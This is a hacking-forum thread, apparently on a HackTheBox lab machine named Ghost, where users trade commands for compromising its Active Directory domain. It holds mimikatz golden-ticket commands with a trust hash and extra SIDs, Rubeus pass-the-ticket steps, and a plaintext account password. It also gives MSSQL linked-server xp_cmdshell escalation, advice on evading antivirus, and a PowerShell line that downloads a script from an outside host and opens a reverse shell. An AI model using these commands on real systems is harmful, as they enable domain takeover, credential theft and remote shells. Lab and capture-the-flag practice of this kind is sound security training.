Possibly Related Threads…

nish · (This post was last modified: Jul 15, 2024, 04:27 PM by nish.)

(Jul 15, 2024, 04:04 PM)phar Wrote:
(Jul 15, 2024, 02:55 PM)metasan Wrote:
(Jul 15, 2024, 01:25 PM)eunaosei Wrote:
(Jul 15, 2024, 12:34 PM)r9967252 Wrote:
(Jul 15, 2024, 12:09 PM)bmoon10 Wrote: dir \\DC01.ghost.htb\C$ returns access denied if there are issues in the tickets.
if both tgt, tgs works properly you won't face issues with the dir command.

me too getting access denied error, below are my commands, i don't think there is anything mis-typed, please help

.\mimikatz "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit .\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt .\Rubeus.exe ptt /ticket:golden.kirbi dir \\dc01.ghost.htb\c$

nvm, need to do this first

.\mimikatz "lsadump::trust /patch" exit

[*]Action: Ask TGS [*]Using domain controller: dc01.ghost.htb (10.0.0.254) [*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket [*]Building TGS-REQ request for: 'CIFS/dc01.ghost.htb' [X] KRB-ERROR (68) : KDC_ERR_WRONG_REALM

i believe domain sid on mimikatz is wrong, how can i enumerate that?

Domain SID is good. User SID is wrong.
You can get some infos like that :

wmic useraccount get name,sid

metasan is right, the user SID is wrong, use wmic useraccount get name,sid and use the SID for krbtgt to properly set the ticket. Once that's done correctly you can dir \\dc01.ghost.corp\c$ without issue. It took a bit of playing around (mine was \mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit) and then everything worked.

This will work...!

maggi · (This post was last modified: Jul 15, 2024, 04:56 PM by maggi.)

PS C:\users\administrator\Desktop> Convert-NameToSid corp.ghost.htb\krbtgt
Convert-NameToSid corp.ghost.htb\krbtgt
S-1-5-21-2034262909-2733679486-179904498-502
PS C:\users\administrator\Desktop> Convert-NameToSid ghost.htb\krbtgt
Convert-NameToSid ghost.htb\krbtgt
S-1-5-21-4084500788-938703357-3654145966-502
PS C:\users\administrator\Desktop>
Get-DomainSID
S-1-5-21-2034262909-2733679486-179904498

idk if I got the right sids?

phar · Jul 15, 2024, 05:45 PM

(Jul 15, 2024, 04:37 PM)bl4ckp4nth3r3 Wrote:
(Jul 15, 2024, 04:25 PM)nish Wrote:
(Jul 15, 2024, 04:04 PM)phar Wrote:
(Jul 15, 2024, 02:55 PM)metasan Wrote:
(Jul 15, 2024, 01:25 PM)eunaosei Wrote:
[*]Action: Ask TGS [*]Using domain controller: dc01.ghost.htb (10.0.0.254) [*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket [*]Building TGS-REQ request for: 'CIFS/dc01.ghost.htb' [X] KRB-ERROR (68) : KDC_ERR_WRONG_REALM

i believe domain sid on mimikatz is wrong, how can i enumerate that?

Domain SID is good. User SID is wrong.
You can get some infos like that :

wmic useraccount get name,sid

metasan is right, the user SID is wrong, use wmic useraccount get name,sid and use the SID for krbtgt to properly set the ticket. Once that's done correctly you can dir \\dc01.ghost.corp\c$ without issue. It took a bit of playing around (mine was \mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit) and then everything worked.
This will work...!

[*]502 is the SID krbtgt but where you find that SID of 519? i am not see this SID anywhere?

I had it and then I lost it, it's under the ExtraSID portion of ghost-corp\administrator and I suspect, totally could be wrong as I can't find how I found it, it's the SID for Enterprise Admins.

jigahiga · Jul 15, 2024, 07:51 PM

```
Name SID
Administrator S-1-5-21-2034262909-2733679486-179904498-500
Guest S-1-5-21-2034262909-2733679486-179904498-501
krbtgt S-1-5-21-2034262909-2733679486-179904498-502
Administrator S-1-5-21-4084500788-938703357-3654145966-500
Guest S-1-5-21-4084500788-938703357-3654145966-501
krbtgt S-1-5-21-4084500788-938703357-3654145966-502
kathryn.holland S-1-5-21-4084500788-938703357-3654145966-3602
cassandra.shelton S-1-5-21-4084500788-938703357-3654145966-3603
robert.steeves S-1-5-21-4084500788-938703357-3654145966-3604
florence.ramirez S-1-5-21-4084500788-938703357-3654145966-3606
justin.bradley S-1-5-21-4084500788-938703357-3654145966-3607
arthur.boyd S-1-5-21-4084500788-938703357-3654145966-3608
beth.clark S-1-5-21-4084500788-938703357-3654145966-3610
charles.gray S-1-5-21-4084500788-938703357-3654145966-3611
jason.taylor S-1-5-21-4084500788-938703357-3654145966-3612
intranet_principal S-1-5-21-4084500788-938703357-3654145966-3614
gitea_temp_principal S-1-5-21-4084500788-938703357-3654145966-3615
```

`.\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-502 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi"`

`.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dc Big Grin

C01.ghost.htb /nowrap /ptt`

dir \\DC01.ghost.htb\C$

Still showing denied

Juicefest · Jul 15, 2024, 08:40 PM

(Jul 15, 2024, 07:51 PM)jigahiga Wrote: ```
Name SID
Administrator S-1-5-21-2034262909-2733679486-179904498-500
Guest S-1-5-21-2034262909-2733679486-179904498-501
krbtgt S-1-5-21-2034262909-2733679486-179904498-502
Administrator S-1-5-21-4084500788-938703357-3654145966-500
Guest S-1-5-21-4084500788-938703357-3654145966-501
krbtgt S-1-5-21-4084500788-938703357-3654145966-502
kathryn.holland S-1-5-21-4084500788-938703357-3654145966-3602
cassandra.shelton S-1-5-21-4084500788-938703357-3654145966-3603
robert.steeves S-1-5-21-4084500788-938703357-3654145966-3604
florence.ramirez S-1-5-21-4084500788-938703357-3654145966-3606
justin.bradley S-1-5-21-4084500788-938703357-3654145966-3607
arthur.boyd S-1-5-21-4084500788-938703357-3654145966-3608
beth.clark S-1-5-21-4084500788-938703357-3654145966-3610
charles.gray S-1-5-21-4084500788-938703357-3654145966-3611
jason.taylor S-1-5-21-4084500788-938703357-3654145966-3612
intranet_principal S-1-5-21-4084500788-938703357-3654145966-3614
gitea_temp_principal S-1-5-21-4084500788-938703357-3654145966-3615
```

`.\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-502 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi"`

`.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dcC01.ghost.htb /nowrap /ptt`

dir \\DC01.ghost.htb\C$

Still showing denied

Worked for me by adding this tothe rubeus asktgs command:

`/impersonateuser:Administrator`

Uliys · Jul 15, 2024, 09:26 PM

Anyone knows the intended way via justin.bradley? Any tips for that?

phar · Jul 15, 2024, 09:53 PM

(Jul 15, 2024, 07:51 PM)jigahiga Wrote: ```
Name SID
Administrator S-1-5-21-2034262909-2733679486-179904498-500
Guest S-1-5-21-2034262909-2733679486-179904498-501
krbtgt S-1-5-21-2034262909-2733679486-179904498-502
Administrator S-1-5-21-4084500788-938703357-3654145966-500
Guest S-1-5-21-4084500788-938703357-3654145966-501
krbtgt S-1-5-21-4084500788-938703357-3654145966-502
kathryn.holland S-1-5-21-4084500788-938703357-3654145966-3602
cassandra.shelton S-1-5-21-4084500788-938703357-3654145966-3603
robert.steeves S-1-5-21-4084500788-938703357-3654145966-3604
florence.ramirez S-1-5-21-4084500788-938703357-3654145966-3606
justin.bradley S-1-5-21-4084500788-938703357-3654145966-3607
arthur.boyd S-1-5-21-4084500788-938703357-3654145966-3608
beth.clark S-1-5-21-4084500788-938703357-3654145966-3610
charles.gray S-1-5-21-4084500788-938703357-3654145966-3611
jason.taylor S-1-5-21-4084500788-938703357-3654145966-3612
intranet_principal S-1-5-21-4084500788-938703357-3654145966-3614
gitea_temp_principal S-1-5-21-4084500788-938703357-3654145966-3615
```

`.\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-502 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi"`

`.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dcC01.ghost.htb /nowrap /ptt`

dir \\DC01.ghost.htb\C$

Still showing denied

change sid: to S-1-5-21-2034262909-2733679486-179904498-502 and sids: to S-1-5-21-4084500788-938703357-3654145966-519 and that should work.

xiliobingo · Jul 15, 2024, 10:23 PM

(Jul 14, 2024, 03:47 PM)mmkz Wrote:
(Jul 14, 2024, 02:35 PM)Rug4lo Wrote:
(Jul 14, 2024, 02:19 PM)imhitt Wrote:
(Jul 14, 2024, 02:12 PM)ZeetaOnline Wrote:
(Jul 14, 2024, 01:58 PM)Rug4lo Wrote: do this in mssql as florence.ramirez@ghost.htb:uxLmt*udNc6t3HrF and get the shell to the windows

SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > xp_cmdshell "whoami"

Amazing... I was doing without link selection..
Thanks.

How to bypass AV ?

Use this .ps1 with metasploit, and use metasploit to privesc (using getsystem command)

https://gist.github.com/qtc-de/1ecc57264...dd12f2f276
Thanks again Rug4lo.

PS C:\> whoami whoami nt authority\system PS C:\>

What's next please...

can you please explain
what commands did you use

niktonet · Jul 15, 2024, 10:35 PM

To bypass av i used https://github.com/rexpository/powercat-v2.0, then renamed powercat.ps1 to x.ps1 and served it with python http server then i did

SQL (GHOST\florence.ramirez guest@master)> use_link [PRIMARY]
SQL >[PRIMARY] (bridge_corp bridge_corp@master)> use master
[*]INFO(PRIMARY): Line 1: Changed database context to 'master'.
SQL >[PRIMARY] (bridge_corp bridge_corp@master)> exec_as_login sa
SQL >[PRIMARY] (sa dbo@master)> xp_cmdshell powershell "iex(new-object net.webclient).downloadstring(\"http://10.10.X.X/x.ps1\");powerrcatt -c 10.10.X.X -p PORT -e cmd"

and start a listener on PORT

---

can someone give me a hand i cant seem to find the correct kdc realm or the correct sids

wmic useraccount where name='krbtgt' get sid

wmic useraccount where name='krbtgt' get sid

SID                                          

S-1-5-21-2034262909-2733679486-179904498-502  

S-1-5-21-4084500788-938703357-3654145966-502

mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-502 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit 

mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-502 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit

.\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt /impersonateuser:Administrator

[X] KRB-ERROR (68) : KDC_ERR_WRONG_REALM

idrkwhatimdoing · Jul 16, 2024, 03:20 AM

I cant get evil-winrm to work with proxychains, how should I be configuring peoxychains??

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] CPTS 12 FLAGS	pulsebreaker	68	1,917	4 hours ago Last Post: VictorPipeau
	[FREE] HackTheBox Dante - complete writeup written by Tamarisk	Tamarisk	601	91,515	4 hours ago Last Post: VictorPipeau
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	371	92,790	5 hours ago Last Post: phannguyenbaouy1
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	21	2,604	9 hours ago Last Post: popoler
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,249	Yesterday, 02:10 PM Last Post: kkkato